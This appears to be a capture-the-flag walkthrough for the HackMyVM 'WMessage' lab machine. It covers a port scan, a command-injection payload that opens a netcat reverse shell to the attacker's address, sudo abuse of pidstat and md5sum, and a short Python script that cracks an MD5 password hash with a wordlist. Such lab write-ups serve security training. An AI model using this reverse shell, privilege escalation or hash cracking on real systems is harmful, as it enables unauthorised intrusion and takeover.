NOTES ABOUT WMessage

[ 2022-12-01 ] [ HackMyVM / WMessage ]

Status: Rooted
Skills: Port Scanning, Command Injection, Sudo, Hash Cracking
Tools: nmap, nc, python

PORT SCANNING

  1. $ nmap -sCSV -p- 10.0.2.46
  2.  
  3. PORT   STATE SERVICE VERSION
  4. 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
  5. | ssh-hostkey: 
  6. |   3072 62:8e:95:58:1e:ee:94:d1:56:0e:e5:51:f5:45:38:43 (RSA)
  7. |   256 45:a8:7e:56:7f:df:b0:83:65:6c:88:68:19:a4:86:6c (ECDSA)
  8. |_  256 bc:54:24:a6:0a:8b:6d:34:dc:a6:ab:80:98:ee:1f:f7 (ED25519)
  9. 80/tcp open  http    Apache httpd 2.4.54 ((Debian))
  10. | http-title: Login
  11. |_Requested resource was /login?next=%2F
  12. |_http-server-header: Apache/2.4.54 (Debian)

GETTING IN

Register in website. Run command injecting reverse shell:

  1. !mpstat; nc 10.0.2.15 443 -c sh

ELEVATING PRIVILEGES

  1. $ sudo -l
  2. Matching Defaults entries for www-data on MSG:
  3.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  4.  
  5. User www-data may run the following commands on MSG:
  6.     (messagemaster) NOPASSWD: /bin/pidstat
  7.     
  8. $ sudo -u messagemaster /bin/pidstat -e /bin/bash -i 
  9.  
  10. messagemaster@MSG:/$ id
  11. uid=1000(messagemaster) gid=1000(messagemaster) groups=1000(messagemaster),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth)
  12.  
  13. messagemaster@MSG:/$ cat User.txt
  14. *****************
  15.  
  16. messagemaster@MSG:/$ sudo -l
  17. Matching Defaults entries for messagemaster on MSG:
  18.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  19.  
  20. User messagemaster may run the following commands on MSG:
  21.     (ALL) NOPASSWD: /bin/md5sum
  22.  
  23.  
  24. messagemaster@MSG:/$ sudo /bin/md5sum /var/www/ROOTPASS
  25. 85c73111b30f9ede8504bb4a4b682f48  /var/www/ROOTPASS
  26.  
  27. messagemaster@MSG:/$ su root
  28. Password: ****** #cracked md5 hash (Dict: rockyou.txt)
  29.  
  30. root@MSG:/# id
  31. uid=0(root) gid=0(root) groups=0(root)
  32. root@MSG:/# cd 
  33.  
  34. root@MSG:~# ls -la
  35. -rw-r-----  1 root root   33 Nov 22 12:37 Root.txt
  36.  
  37. cat Root.txt
  38. *****************
  39.  
  40.  
  41. root@MSG:~# init 0

MINIMAL PYTHON SCRIPT FOR MD5 CRACKING WITH DICT:

  1. import hashlib
  2. for l in open("rockyou.txt", encoding="utf-8", errors="ignore"): 
  3. 	if hashlib.md5((l.strip()+"\n").encode()).hexdigest()  == "85c73111b30f9ede8504bb4a4b682f48":
  4. 		print(l)

--- Loaded 915 times ---